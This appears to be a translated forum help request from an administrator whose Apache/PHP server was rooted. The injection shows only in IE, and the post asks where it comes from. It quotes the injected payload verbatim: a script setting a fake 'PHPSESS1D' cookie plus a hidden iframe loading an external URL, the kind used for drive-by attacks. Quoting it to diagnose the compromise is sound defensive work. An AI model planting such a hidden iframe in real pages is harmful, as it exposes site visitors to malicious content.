更新:服务器被植根,php.ini 被替换,导致注入出现。仍然没有弄清楚哪个指令正在注入 javascript。
我正在对一个被黑的网站进行故障排除,其中每个 PHP 文件中都注入了一个 javascript,并且只有 PHP。注入也只出现在 IE 中。我以前有过注入的经验,但大多数都是通过 FTP 注入的,您可以在页面本身中看到它们。到目前为止,我没有在服务器上看到任何病毒或恶意进程,并且开始认为 PHP 解释器或 Apache 以某种方式被黑客入侵。有没有人见过这个或者知道我应该去哪里看?注射如下,
<script type="text/javascript">
d=new Date();
d.setDate(d.getDate()+1);
document.cookie="PHPSESS1D=1; path=/; expires=" + d.toGMTString();
</script><style type="text/css">#yavvw {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="yavvw" src="http://SANITISEDURL.net/ad.jpg?2"></iframe>
这发生在服务器上的所有网站上,即使 PHP 文件只有一个简单的回显。.htaccess 对所有这些看起来都很干净。运行 PHP 5.2.17 和 Apache 2.2.17 的服务器。